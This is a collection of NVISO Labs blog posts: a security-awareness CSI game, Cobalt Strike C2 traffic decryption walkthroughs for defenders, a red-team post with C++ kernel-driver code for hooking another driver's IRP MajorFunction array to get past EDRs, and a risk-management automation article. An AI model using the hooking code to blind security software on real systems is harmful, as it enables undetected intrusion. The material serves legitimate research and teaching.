  • Make something fun out of the everyday security challenges we face in our day-to-day life, at home. Basically, challenges that should be familiar for any player. Not to teach something new, but to reinforce existing awareness as a main goal.
  • Set up a digital experience that allowed people working remotely to collaborate smoothly in a team, and to compete against each other in teams.

Gamification being all the rage, there is quite a few options out there. Some of which we’ve tested and used for projects in the past. Think Online Cyber Escape Games (even a full size escape truck) scavenger hunts, online quizzes, e-learnings, … You name it. However, none of these fully fitted the brief.

A match made in…

Gather.town logo

Inspired by the CSCBE 2021 event, successfully hosted remotely through the use of Gather.town, we came up with the idea of creating our own game and dedicated space. An all-in-one solution which is fully customizable and which allows for direct audio and video communication between hosts, players and teams. A match made in cyber awareness heaven? Or too good to be true? Let’s dive into the details.

Concept

As a concept we opted for the well-known schemes of a classic Crime Scene Investigation (CSI) game which has shown to be a successful basis for many legendary series and video games. We came up with a cyber related crime that could fit into the personal and social environment of your average neighbour and created a whole world around it. By world we mean: a location, a family (and pet), a social life, pieces of evidence and of course many irrelevant objects to create some noise ;-). All elements of this fictional world are linked to clearly defined (not so fictional) cyber security topics and lessons.

“The Harris’s family apartment gets robbed in the middle of the night without them noticing. 

This is strange, since their newly installed connected alarm system was active and signalled “all clear” when they woke up that morning. The whole family is a bit shaken, and no-one can really explain what happened…​

Turns out their alarm system has been compromised and was turned off to ensure the burglar had easy access.”

Teams signing up for the game will be asked to investigate the crime, in order to be able to answer the main question: “how did it happen?”. Additional questions are asked in the ‘investigation report’ to be able to distinguish between top teams and to allow for the game to be a real competition with final scores and a leadership board.

Connecting the dots: tips to create an attractive and usable Gather.town virtual world

To allow for this concept to work in practice, we needed a strong and stable platform that would deliver on both connectivity and experience. That’s were Gather.town comes in play.

Disclaimer: we don’t have any particular business relationship with Gather.town. It’s just that we’ve tested a few platforms, and really liked that particular one.

Designing an attractive map

CSI Game map edition in Tiled

Gather.town consists in a map filled with interactive objects, where your avatar can move around the map and interact with the objects.

First, we needed to create a map that would fulfil our scenario requirements while also being intuitive to walk on for non-gamers people. Instead of designing everything from scratch, we used tile sets from the well-known RPG Maker series and adapted them so they could be easily manipulated in an open-source map editing software called Tiled. Using this software, we were able to divide the map into a set of two layers, the foreground and background. This allowed for a more realistic way of moving in the room by giving a perception of depth for the players.

We decided to go for a square and compact room so that people do not get lost easily, along with the fact that everyone could hear each other even from the other side of the map. However, the sky is basically the limit here. Endless options to go crazy. It is however important to note that this kind of configuration details do really affect the overall user experience and should therefore not be left to chance.

Have the players check out the content of a computer, in the map

As the Gather.town platform is still under development, the number of features available was limited compared to our ambitious game scenario. To increase the range of possible types of interactive objects, we decided to embed a home-made web application to be shown as an iframe in the game. This could be then presented as the content of a computer – for example, the social media profile of a family member, their e-mail inbox, or some Twitter post.       

To touch upon the topic of phishing, we created an e-mail inbox (c.f. screenshot below) with four emails that could or could not be phishing. We decided to go with all legitimate emails for each of which an additional piece of evidence was added somewhere in the room. Participants still needed to look for red flags in the emails, but would find justifications for each email during their investigation.

Mailbox of mother Suzy

Another example is a social media account (and privacy settings page) we created for one of the family members to introduce the topic of social engineering. Participants would need to make some links between this profile and testimonials to understand how the burglar use that technique to commit their crime.

To balance the costs and efforts, we decided to go for a frontend application which would simply be hosted on a S3 AWS Bucket. The application was made using Vue.JS along with Buefy so that we would not have to worry about the design either.

Each interactive item is corresponding to a different path in the URL. Having a frontend-only application did not prevent us from building interactive items. Indeed, we implemented a fake login screen which would validate the credentials in the frontend directly. As the players have a limited time to complete investigation, it is unlikely they will search for the solution in the source code, so we considered we could afford the risk of cheating. However, in general, let’s not consider this as a good practice to validate passwords! 😉

Collecting & processing responses

In order to capture answers to be provided through the investigation report, we used Microsoft Forms (we could not use our web application as it’s a frontend-only one). The great thing about using Microsoft 365 tools is that it allowed us to process the input through a Microsoft Power Automate flow. That way we could already pre-calculate some of the scoring and redirect the output in order to make it easier for the host to preview.

Additionally, we aimed at providing a leader board in real-time and give the result to the players just after they finish the game for the ultimate game/competition experience. It was a challenge to give instantly the overall score for 11 questions, all having different weight, some even having a negative score. To ease our task, we went for Microsoft SharePoint Lists. They are similar to Excel sheets, but more user friendly as the formatting can be customized and the output is really visual.

Having implemented the above, our game was ready to be played!

Challenges?

As for any online security awareness campaign, there are inherent challenges that we tried to overcome by being as prepared as possible. On our side as well as on the client’s side.

Reaching a broad audience

Let’s get things straight. Gamification is hot. However, don’t expect people to sign-up just because it’s a game you’re offering. Add some “online fatigue” to the mix and you have a real challenge at hand.

Therefore, it is best to not leave things at chance. From what we have experienced, the following points are important:

  • Investing time in a proper communication plan and clearly explain the goal of the exercise (by the way, planning for Cyber Month 2022 starts now!). Also showing the platform: a cool set up, e.g. with a small video walkthrough, will attract attention! Word of mouth advertising can spark the interest of a colleague. Capturing testimonials from happy early joiners and sharing them with everyone can help too.
  • Adding a bit of competition by using leader boards can also motivate people into playing your game. A small prize and a big recognition for the winners is always cares for effective communication material.

Testing, testing, testing

From the scenario itself to the most technical parts such as the accessibility of the material or the software used for communicating, testing is crucial. Each issue you will encounter early-on, will prevent this issue from happening during actual game sessions.

How we performed the testing phase:

  • We went for three distinct dry runs, with people from different backgrounds and skills, different teams, and with different computers 😊. Not everyone is used to collaboration tools and games, and dry runs enabled us to identify confusing items and rework them.

We had multiple people in our team running the game, sometimes at the same moment too so we needed them to operate with a certain degree of autonomy and know to handle every potential error. We thus thought about the most plausible failure scenarios and prepared a B-plan for each of these cases. Documenting those fallback procedures is essential to ensure issues can be tackled rapidly, when in the midst of the action.

Conclusion

At the end of the day, the CSI concept and the use of Gather.Town as a dedicated space really lived up to our expectations. Participants had fun creating avatars and indicated they had a great time while reinforcing knowledge on Cyber Security Awareness topics they might have come across in the past… If this is setting the bar for next year, we cannot wait to see what Cyber Security Awareness Month has in store for use!

About the authors

Sophie Madessis is a member of the NVISO Labs team involved in various R&D tasks to support other teams regarding cyber security related projects. Along with performing some security assessments, she likes spending time on automating processes using Power Automate and other Microsoft tools. You can find Sophie on Linkedin.

Hannelore Goffin is a senior consultant within the Cyber Strategy team at NVISO where she is passionate about raising awareness on all cyber related topics, both for the professional and personal context. Next to awareness, Hannelore focuses on third party risk management. You can find Hannelore on Linkedin.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Cobalt Strike: Using Process Memory To Decrypt Traffic – Part 3

By: Didier Stevens

We decrypt Cobalt Strike traffic with cryptographic keys extracted from process memory.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. And in part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In this blog post, we will explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump.

Cobalt Strike network traffic can be decrypted with the proper AES and HMAC keys. In part 2, we obtained these keys by decrypting the metadata with the private RSA key. Another way to obtain the AES and HMAC key, is to extract them from the process memory of an active beacon.

One method to produce a process memory dump of a running beacon, is to use Sysinternals’ tool procdump. A full process memory dump is not required, a dump of all writable process memory is sufficient.
Example of a command to produce a process dump of writable process memory: “procdump.exe -mp 1234”, where -mp is the option to dump writable process memory and 1234 is the process ID of the running beacon. The process dump is stored inside a file with extension .dmp.

For Cobalt Strike version 3 beacons, the unencrypted metadata can often be found in memory by searching for byte sequence 0x0000BEEF. This sequence is the header of the unencrypted metadata. The earlier in the lifespan of a process the process dump is taken, the more likely it is to contain the unencrypted metadata.

Figure 1: binary editor view of metadata in process memory

Tool cs-extract-key.py can be used to find and decode this metadata, like this:

Figure 2: extracted and decoded metadata

The metadata contains the raw key: 16 random bytes. The AES and HMAC keys are derived from this raw key by calculating the SHA256 value of the raw key. The first half of the SHA256 value is the HMAC key, and the second half is the AES key.

These keys can then be used to decrypt the captured network traffic with tool cs-parse-http-traffic.py, like explained in Part 2.

Remark that tool cs-extract-key.py is likely to produce false positives: namely byte sequences that start with 0x0000BEEF, but are not actual metadata. This is the case for the example in figure 2: the first instance is indeed valid metadata, as it contains a recognizable machine name and username (look at Field: entries). And the AES and HMAC key extracted from that metadata, have also been found at other positions in process memory. But that is not the case for the second instance (no recognizable names, no AES and HMAC keys found at other locations). And thus that is a false positive that must be ignored.

For Cobalt Strike version 4 beacons, it is very rare that the unencrypted metadata can be recovered from process memory. For these beacons, another method can be followed. The AES and HMAC keys can be found in writable process memory, but there is no header that clearly identifies these keys. They are just 16-byte long sequences, without any distinguishable features. To extract these keys, the method consists of performing a kind of dictionary attack. All possible 16-byte long, non-null sequences found in process memory, will be used to try to decrypt a piece of encrypted C2 communication. If the decryption succeeds, a valid key has been found.

This method does require a process memory dump and encrypted data.
This encrypted data can be extracted using tool cs-parse-http-traffic.py like this: cs-parse-http-traffic.py -k unknown capture.pcapng

With an unknown key (-k unknown), the tool will extract the encrypted data from the capture file, like this:

Figure 3: extracting encrypted data from a capture file

Packet 103 is an HTTP response to a GET request (packet 97). The encrypted data of this response is 64 bytes long: d12c14aa698a6b85a8ed3c3c33774fe79acadd0e95fa88f45b66d8751682db734472b2c9c874ccc70afa426fb2f510654df7042aa7d2384229518f26d1e044bd

This is encrypted data, sent by the team server to the beacon: it contains tasks to be executed by the beacon (remark that in these examples, we look at encrypted traffic that has not been transformed, we will cover traffic transformed by malleable instructions in an upcoming blog post).

We can attempt to decrypt this data by providing tool cs-extract-key.py with the encrypted task (option -t) and the process memory dump: cs-extract-key.py -t d12c14aa698a6b85a8ed3c3c33774fe79acadd0e95fa88f45b66d8751682db734472b2c9c874ccc70afa426fb2f510654df7042aa7d2384229518f26d1e044bd rundll32.exe_211028_205047.dmp.

Figure 4: extracting AES and HMAC keys from process memory

The recovered AES and HMAC key can then be used to decrypt the traffic (-k HMACkey:AESkey):

Figure 5: decrypting traffic with HMAC and AES key provided via option -k

The decrypted tasks seen in figure 5, are “data jitter”. Data jitter is a Cobalt Strike option, that sends random data to the beacon (random data that is ignored by the beacon). With the default Cobalt Strike beacon profile, no random data is sent, and data is not transformed using malleable instructions. This means that with such a beacon profile, no data is sent to the beacon as long as there are no tasks to be performed by the beacon: the Content-length of the HTTP reply is 0.

Since the absence of tasks results in no encrypted data being transmitted, it is quite easy to determine if a beacon received tasks or not, even when the traffic is encrypted. An absence of (encrypted) data means that no tasks were sent. To obfuscate this absence of commands (tasks), Cobalt Strike can be configured to exchange random data, making each packet unique. But in this particular case, that random data is useful to blue teamers: it permits us to recover the cryptographic keys from process memory. If no random data would be sent, nor actual tasks, we would never see encrypted data and thus we would not be able to identify the cryptographic keys inside process memory.

Data sent by the beacon to the team server contains the results of the tasks executed by the beacon. This data is sent with a POST request (default), and is known as a callback. This data too can be used to find decryption keys. In that case, the process is the same as shown above, but the option to use is -c (callback) in stead of -t (tasks). The reason the options are different, is that the way the data is encrypted by the team server is slightly different from the way the data is encrypted by the beacon, and the tool must be told which way to encrypt the data was used.

Some considerations regarding process memory dumps

For a process memory dump of maximum 10MB, the “dictionary” attack will take a couple of minutes.

Full process dumps can be used too, but the dictionary attack can take much longer because of the larger size of the dump. Tool cs-extract-key.py reads the process memory dump as a flat file, and thus a larger file means more processing to be done.

However, we are working on a tool that can parse the data structure of a dump file and extract / decode memory sections that are most likely to contain keys, thus speeding up the key recovery process.

Remark that beacons can be configured to encode their writable memory while they are not active (sleeping): in such cases, the AES and HMAC keys are encoded too, and can not be recovered using the methods described here. The dump parsing tool we are working on will handle this situation too.

Finally, if the method explained here for version 3 beacons does not work with your particular memory dump, try the method for version 4 beacons. This method works also for version 3 beacons.

Conclusion

Cryptographic keys are required to decrypt Cobalt Strike traffic. The best situation is to have the corresponding private RSA key. If that is not the case, HMAC and AES keys can be recovered using a process memory dump and capture file with encrypted traffic.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Kernel Karnage – Part 2 (Back to Basics)

By: bautersj

This week I try to figure out “what makes a driver a driver?” and experiment with writing my own kernel hooks.

1. Windows Kernel Programming 101

In the first part of this internship blog series, we took a look at how EDRs interact with User and Kernel space, and explored a frequently used feature called Kernel Callbacks by leveraging the Windows Kernel Ps Callback Experiments project by @fdiskyou to patch them in memory. Kernel callbacks are only the first step in a line of defense that modern EDR and AV solutions leverage when deploying kernel drivers to identify malicious activity. To better understand what we’re up against, we need to take a step back and familiarize ourselves with the concept of a driver itself.

To do just that, I spent the vast majority of my time this week reading the fantastic book Windows Kernel Programming by Pavel Yosifovich, which is a great introduction to the Windows kernel and its components and mechanisms, as well as drivers and their anatomy and functions.

In this blogpost I would like to take a closer look at the anatomy of a driver and experiment with a different technique called IRP MajorFunction hooking.

2. Anatomy of a driver

Most of us are familiar with the classic C/C++ projects and their characteristics; for example, the int main(int argc, char* argv[]){ return 0; } function, which is the typical entry point of a C++ console application. So, what makes a driver a driver?

Just like a C++ console application, a driver requires an entry point as well. This entry point comes in the form of a DriverEntry() function with the prototype:

NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath);

The DriverEntry() function is responsible for 2 major tasks:

  1. setting up the driver’s DeviceObject and associated symbolic link
  2. setting up the dispatch routines

Every driver needs an “endpoint” that other applications can use to communicate with. This comes in the form of a DeviceObject, an instance of the DEVICE_OBJECT structure. The DeviceObject is abstracted in the form of a symbolic link and registered in the Object Manager’s GLOBAL?? directory (use sysinternal’s WinObj tool to view the Object Manager). User mode applications can use functions like NtCreateFile with the symbolic link as a handle to talk to the driver.

WinObj

Example of a C++ application using CreateFile to talk to a driver registered as “Interceptor” (hint: it’s my driver 😉 ):

HANDLE hDevice = CreateFile(L"\\\\.\\Interceptor)", GENERIC_WRITE | GENERIC_READ, 0, nullptr, OPEN_EXISTING, 0, nullptr);

Once the driver’s endpoint is configured, the DriverEntry() function needs to sort out what to do with incoming communications from user mode and other operations such as unloading itself. To do this, it uses the DriverObject to register Dispatch Routines, or functions associated with a particular driver operation.

The DriverObject contains an array, holding function pointers, called the MajorFunction array. This array determines which particular operations are supported by the driver, such as Create, Read, Write, etc. The index of the MajorFunction array is controlled by Major Function codes, defined by their IRP_MJ_ prefix.

There are 3 main Major Function codes along side the DriverUnload operation which need initializing for the driver to function properly:

// prototypes
void InterceptUnload(PDRIVER_OBJECT);
NTSTATUS InterceptCreateClose(PDEVICE_OBJECT, PIRP);
NTSTATUS InterceptDeviceControl(PDEVICE_OBJECT, PIRP);

//DriverEntry
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    DriverObject->DriverUnload = InterceptUnload;
    DriverObject->MajorFunction[IRP_MJ_CREATE] = InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] =  InterceptCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = InterceptDeviceControl;

    //...
}

The DriverObject->DriverUnload dispatch routine is responsible for cleaning up and preventing any memory leaks before the driver unloads. A leak in the kernel will persist until the machine is rebooted. The IRP_MJ_CREATE and IRP_MJ_CLOSE Major Functions handle CreateFile() and CloseHandle() calls. Without them, handles to the driver wouldn’t be able to be created or destroyed, so in a way the driver would be unusable. Finally, the IRP_MJ_DEVICE_CONTROL Major Function is in charge of I/O operations/communications.

A typical driver communicates by receiving requests, handling those requests or forwarding them to the appropriate device in the device stack (out of scope for this blogpost). These requests come in the form of an I/O Request Packet or IRP, which is a semi-documented structure, accompanied by one or more IO_STACK_LOCATION structures, located in memory directly following the IRP. Each IO_STACK_LOCATION is related to a device in the device stack and the driver can call the IoGetCurrentIrpStackLocation() function to retrieve the IO_STACK_LOCATION related to itself.

The previously mentioned dispatch routines determine how these IRPs are handled by the driver. We are interested in the IRP_MJ_DEVICE_CONTROL dispatch routine, which corresponds to the DeviceIoControl() call from user mode or ZwDeviceIoControlFile() call from kernel mode. An IRP request destined for IRP_MJ_DEVICE_CONTROL contains two user buffers, one for reading and one for writing, as well as a control code indicated by the IOCTL_ prefix. These control codes are defined by the driver developer and indicate the supported actions.

Control codes are built using the CTL_CODE macro, defined as:

#define CTL_CODE(DeviceType, Function, Method, Access)((DeviceType) << 16 | ((Access) << 14) | ((Function) << 2) | (Method))

Example for my Interceptor driver:

#define IOCTL_INTERCEPTOR_HOOK_DRIVER CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_DRIVER CTL_CODE(0x8000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_LIST_DRIVERS CTL_CODE(0x8000, 0x802, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_INTERCEPTOR_UNHOOK_ALL_DRIVERS CTL_CODE(0x8000, 0x803, METHOD_BUFFERED, FILE_ANY_ACCESS)

3. Kernel land hooks

Now that we have a vague idea how drivers communicate with other drivers and applications, we can think about ways to intercept those communications. One of these techniques is called IRP MajorFunction hooking.

hook MFA

Since drivers and all other kernel processes share the same memory, we can also access and overwrite that memory as long as we don’t upset PatchGuard by modifying critical structures. I wrote a driver called Interceptor, which does exactly that. It locates the target driver’s DriverObject and retrieves its MajorFunction array (MFA). This is done using the undocumented ObReferenceObjectByName() function, which uses the driver device name to get a pointer to the DriverObject.

UNICODE_STRING targetDriverName = RTL_CONSTANT_STRING(L"\\Driver\\Disk");
PDRIVER_OBJECT DriverObject = nullptr;

status = ObReferenceObjectByName(
	&targetDriverName,
	OBJ_CASE_INSENSITIVE,
	nullptr,
	0,
	*IoDriverObjectType,
	KernelMode,
	nullptr,
	(PVOID*)&DriverObject
);

if (!NT_SUCCESS(status)) {
	KdPrint((DRIVER_PREFIX "failed to obtain DriverObject (0x%08X)\n", status));
	return status;
}

Once it has obtained the MFA, it will iterate over all the Dispatch Routines (IRP_MJ_) and replace the pointers, which are pointing to the target driver’s functions (0x1000 – 0x1003), with my own pointers, pointing to the *InterceptHook functions (0x2000 – 0x2003), controlled by the Interceptor driver.

for (int i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) {
    //save the original pointer in case we need to restore it later
	globals.originalDispatchFunctionArray[i] = DriverObject->MajorFunction[i];
    //replace the pointer with our own pointer
	DriverObject->MajorFunction[i] = &GenericHook;
}
//cleanup
ObDereferenceObject(DriverObject);

As an example, I hooked the disk driver’s IRP_MJ_DEVICE_CONTROL dispatch routine and intercepted the calls:

Hooked IRP Disk Driver

This method can be used to intercept communications to any driver but is fairly easy to detect. A driver controlled by EDR/AV could iterate over its own MajorFunction array and check the function pointer’s address to see if it is located in its own address range. If the function pointer is located outside its own address range, that means the dispatch routine was hooked.

4. Conclusion

To defeat EDRs in kernel space, it is important to know what goes on at the core, namely the driver. In this blogpost we examined the anatomy of a driver, its functions, and their main responsibilities. We established that a driver needs to communicate with other drivers and applications in user space, which it does via dispatch routines registered in the driver’s MajorFunction array.

We then briefly looked at how we can intercept these communications by using a technique called IRP MajorFunction hooking, which patches the target driver’s dispatch routines in memory with pointers to our own functions, so we can inspect or redirect traffic.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

✇ NVISO Labs

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 2

By: Didier Stevens

We decrypt Cobalt Strike traffic using one of 6 private keys we found.

In this blog post, we will analyze a Cobalt Strike infection by looking at a full packet capture that was taken during the infection. This analysis includes decryption of the C2 traffic.

If you haven’t already, we invite you to read part 1 first: Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1.

For this analysis, we are using capture file 2021-02-02-Hancitor-with-Ficker-Stealer-and-Cobalt-Strike-and-NetSupport-RAT.pcap.zip, this is one of the many malware traffic capture files that Brad Duncan shares on his web site Malware-Traffic-Analysis.net.

We start with a minimum of knowledge: the capture file contains encrypted HTTP traffic of a Cobalt Strike beacon communicating with its team server.

If you want to know more about Cobalt Strike and its components, we highly recommend the following blog post.

First step: we open the capture file with Wireshark, and look for downloads of a full beacon by stager shellcode.

Although beacons can come in many forms, we can identify 2 major categories:

  1. A small piece of shellcode (a couple of hundred bytes), aka the stager shellcode, that downloads the full beacon
  2. The full beacon: a PE file that can be reflectively loaded

In this first step, we search for signs of stager shellcode in the capture file: we do this with the following display filter: http.request.uri matches “/….$”.

Figure 1: packet capture for Cobalt Strike traffic

We have one hit. The path used in the GET request to download the full beacon, consists of 4 characters that satisfy a condition: the byte-value of the sum of the character values (aka checksum 8) is a known constant. We can check this with the tool metatool.py like this:

Figure 2: using metatool.py

More info on this checksum process can be found here.
The output of the tool shows that this is a valid path to download a 32-bit full beacon (CS x86).
The download of the full beacon is captured too:

Figure 3: full beacon download

And we can extract this download:

Figure 4: export HTTP objects
Figure 5: selecting download EbHm for saving
Figure 6: saving selected download to disk

Once the full beacon has been saved to disk as EbHm.vir, it can be analyzed with tool 1768.py. 1768.py is a tool that can decode/decrypt Cobalt Strike beacons, and extract their configuration. Cobalt Strike beacons have many configuration options: all these options are stored in an encoded and embedded table.

Here is the output of the analysis:

Figure 7: extracting beacon configuration

Let’s take a closer look at some of the options.

First of all, option 0x0000 tells us that this is an HTTP beacon: it communicates over HTTP.
It does this by connecting to 192.254.79[.]71 (option 0x0008) on port 8080 (option 0x0002).
GET requests use path /ptj (option 0x0008), and POST requests use path /submit.php (option 0x000a)
And important for our analysis: there is a known private key (Has known private key) for the public key used by this beacon (option 0x0007).

Thus, armed with this information, we know that the beacon will send GET requests to the team server, to obtain instructions. If the team server has commands to be executed by the beacon, it will reply with encrypted data to the GET request. And when the beacon has to send back output from its commands to the team server, it will use a POST request with encrypted data.

If the team server has no commands for the beacon, it will send no encrypted data. This does not necessarily mean that the reply to a GET request contains no data: it is possible for the operator, through profiles, to masquerade the communication. For example, that the encrypted data is inside a GIF file. But that is not the case with this beacon. We know this, because there are no so-called malleable C2 instructions in this profile: option 0x000b is equal to 0x00000004 -> this means no operations should be performed on the data prior to decryption (we will explain this in more detail in a later blog post).

Let’s create a display filter to view this C2 traffic: http and ip.addr == 192.254.79[.]71

Figure 8: full beacon download and HTTP requests with encrypted Cobalt Strike traffic

This displays all HTTP traffic to and from the team server. Remark that we already took a look at the first 2 packets in this view (packets 6034 and 6703): that’s the download of the beacon itself, and that communication is not encrypted. Hence, we will filter these packets out with the following display filter:

http and ip.addr == 192.254.79.71 and frame.number > 6703

This gives us a list of GET requests with their reply. Remark that there’s a GET request every minute. That too is in the beacon configuration: 60.000 ms of sleep (option 0x0003) with 0% variation (aka jitter, option 0x0005).

Figure 9: HTTP requests with encrypted Cobalt Strike traffic

We will now follow the first HTTP stream:

Figure 10: following HTTP stream
Figure 11: first HTTP stream

This is a GET request for /ptj that receives a STATUS 200 reply with no data. This means that there are no commands from the team server for this beacon for now: the operator has not issued any commands at that point in the capture file.

Remark the Cookie header of the GET request. This looks like a BASE64 string: KN9zfIq31DBBdLtF4JUjmrhm0lRKkC/I/zAiJ+Xxjz787h9yh35cRjEnXJAwQcWP4chXobXT/E5YrZjgreeGTrORnj//A5iZw2TClEnt++gLMyMHwgjsnvg9czGx6Ekpz0L1uEfkVoo4MpQ0/kJk9myZagRrPrFWdE9U7BwCzlE=

That value is encrypted metadata that the beacon sends as a BASE64 string to the team server. This metadata is RSA encrypted with the public key inside the beacon configuration (option 0x0007), and the team server can decrypt this metadata because it has the private key. Remember that some private keys have been “leaked”, we discussed this in our first blog post in this series.

Our beacon analysis showed that this beacon uses a public key with a known private key. This means we can use tool cs-decrypt-metadata.py to decrypt the metadata (cookie) like this:

Figure 12: decrypting beacon metadata

We can see here the decrypted metadata. Very important to us, is the raw key: caeab4f452fe41182d504aa24966fbd0. We will use this key to decrypt traffic (the AES adn HMAC keys are derived from this raw key).

More metadata that we can find here is: the computername, the username, …

We will now follow the HTTP stream with packets 9379 and 9383: this is the first command send by the operator (team server) to the beacon:

Figure 13: HTTP stream with encrypted command

Here we can see that the reply contains 48 bytes of data (Content-length). That data is encrypted:

Figure 14: hexadecimal view of HTTP stream with encrypted command

Encrypted data like this, can be decrypted with tool cs-parse-http-traffic.py. Since the data is encrypted, we need to provide the raw key (option -r caeab4f452fe41182d504aa24966fbd0) and as the packet capture contains other traffic than pure Cobalt Strike C2 traffic, it is best to provide a display filter (option -Y http and ip.addr == 192.254.79.71 and frame.number > 6703) so that the tool can ignore all HTTP traffic that is not C2 traffic.

This produces the following output:

Figure 15: decrypted commands and results

Now we can see that the encrypted data in packet 9383 is a sleep command, with a sleeptime of 100 ms and a jitter factor of 90%. This means that the operator instructed the beacon to beacon interactive.

Decrypted packet 9707 contains an unknown command (id 53), but when we look at packet 9723, we see a directory listing output: this is the output result of the unknown command 53 being send back to the team server (notice the POST url /submit.php). Thus it’s safe to assume that command 53 is a directory listing command.

There are many commands and results in this capture file that tool cs-parse-http-traffic.py can decrypt, too much to show here. But we invite you to reproduce the commands in this blog post, and review the output of the tool.

The last command in the capture file is a process listing command:

Figure 16: decrypted process listing command and result

Conclusion

Although the packet capture file we decrypted here was produced more than half a year ago by Brad Duncan by running a malicious Cobalt Strike beacon inside a sandbox, we can decrypt it today because the operators used a rogue Cobalt Strike package including a private key, that we recovered from VirusTotal.

Without this private key, we would not be able to decrypt the traffic.

The private key is not the only way to decrypt the traffic: if the AES key can be extracted from process memory, we can also decrypt traffic. We will cover this in an upcoming blog post.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Automate, automate, automate: Three Ways to Increase the Value from Third Party Risk Management Efforts

By: Pieter Batsleer

Third Party Risk Management (“TPRM”) efforts are often considered labour-intensive, with numerous tedious, manual steps. Often, an equal amount of effort is put into managing the process as is to focusing on risks. In order to avoid this, we’d like to share three ways in which we’ve been boosting our own TPRM efficiency – through automation of three crucial phases in the third party risk assessment process:

(1) during initiation (the business risk/criticality assessment),

(2) while performing your third party (due diligence) assessments and

(3) during the monitoring phase following the assessment.

This article elaborates further on the automation of the above.

  1. Automate the third-party criticality assessment

When you are applying a risk-based approach to your TPRM efforts, third party assessments are initiated with a criticality or business risk assessment using information from the business owner working with the third party. Most of our customers will document the criticality assessment in an Excel file with a lot of back-and-forth communication.

When reviewing the intake form, we realised that the intake could be distilled to a few multiple-choice questions, such as the highest category of data the third-party can access, the level of system access and so on. We created the possibility for the customer to conduct a short, simplified assessment through Microsoft Forms. This is easily available through one single link and avoids clutter (caused by different versions of Excel files, for example). In addition, through Microsoft Flow, the output from that Form is automatically grabbed and imported in a repository. Finally, we made sure an MS Planner Task is created for each new assessment which triggers the involvement of the security second line function.

Figure 1: Gathering the MS Forms output, assigning an assessment ID and storing the gathered criticality assessment input data.
Figure 2: Summarising the outcome in an email to security team (for validation) and creation of a task for follow-up through MS Planner.

This approach results in significant value increase because it can:

  • Give the business owner a more user-friendly GUI rather than an Excel sheet, which they are expected to complete.
  • Enable owners to initiate a third-party security assessment at any given time, without the initiation by second line.
  • Empower the second line to focus on understanding and challenging the provided input.
  • Improve administration aspects around the execution of the third-party security risk assessments are completed within a short time frame.

Do you want to take it to the next level? Integrate an automated approval through Power Automate for the security team.

The above case requires a low effort customisation to fully tailor this to your organisation and guarantees time efficiencies and better flexibility.

  1. Automate the execution of the assessments by leveraging tooling

You might still be wondering: how do we finally get rid of those Excel files to exchange with our third parties?  You could address this by using tooling throughout the assessment process. By leveraging these tools (such as Ceeyu, OneTrust Vendorpedia, Security Scorecard Atlas, Qualys SAQ, Prevalent and more) not only the tedious tasks of the criticality assessment, but also those of the consequential third party due diligence assessment, can be automated. Examples of tasks we have automated with such tooling include:

  • The exchange of the due diligence questionnaires.
  • The uploading and collecting of supporting evidence.
  • The tracking of the overall progress of the assessment (including the history of the review), and
  • Reporting of the assessment outcome and scoring (including comparison of vendors).

Again, significant value increase is the result and you can:

  • Reduce time-to-market: the administrative overhead per assessment, leading to a reduced average lead time of the assessment.
  • Identify bottlenecks: clearly pinpoint the bottleneck if the assessment does get stuck somewhere with a centralized overview of the actual status of the assessment.
  • Free up valuable time: allow the security team reviewing the provided input to focus their time on what really matters: reviewing the output.
  • Leverage reporting possibilities: minimise the effort in creating custom reports for management reporting using the cutting edge built-in reporting features.

Of course, this requires having the right tools at your disposition – however, implemented at scale, the efficiency and quality returns of the tools nearly always surpass the cost of such tooling. At NVISO for example, we’ve been able to decrease our nominal assessment cost by about 20% and our tool provides a portal to our customers that brings transparency and visibility on the handling of incoming TPRM requests.

  1. Automate the monitoring and follow-up on agreed actions by leveraging tooling

In order to maximise automation, you should also consider it for your monitoring actions. Very often assessments remain a point-in-time assessment (“snapshot”) which only paints a partial picture on how seriously your third parties take security. It is of equal importance to monitor their efforts to improve their security posture over time – i.e. the timely and effective implementation of your recommendations, and the evolution of their overall security posture. Automation can also play a major role in this process.

Here also, you would create value increase because you can:

  • Automate action plan monitoring: send automated reminders to the third parties in line with set due dates for identified follow-up actions.
  • Automate escalation: escalate to the business owner in case of overdue actions, potentially with different business rules depending on the business criticality of the supplier.
  • Free up valuable time: reducing manual interventions of your second line team helps focusing on where it really matters: is the identified action effectively addressed? Is the remediation effective in reducing the risk? We typically adopt a risk-driven, sample-based approach in verifying this.
  • Stay up to date: trigger automated reinitiation of assessments when they are due for a third party.

